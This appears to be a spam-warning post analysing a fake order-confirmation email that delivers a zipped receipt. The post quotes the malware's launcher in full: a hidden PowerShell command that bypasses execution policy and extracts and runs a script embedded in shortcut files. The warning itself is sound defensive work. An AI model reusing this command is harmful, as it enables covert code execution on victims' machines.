Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent
This email has been spotted this week:
From: [email protected]
Sent: Monday, July 30, 2018 10:52 PM
To: Recipient
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent
Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.
|
WOMEN
|
MEN
|
ACCESSORIES
|
HOME DECOR
|
GADGETS
|
|
Hi Your Name,
|
|
Great news! Your order is now confirmed. We will email you again when your items ship.
Thanks for shopping with us!
|
|
|
|
This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us
|
|
|
|
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
If you unzip the file that is provided you see an image:
Which presumably pretends to be a real company.
And a file which runs a script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
We will let you know.
Anyway, report the sender and the website and keep vigilant!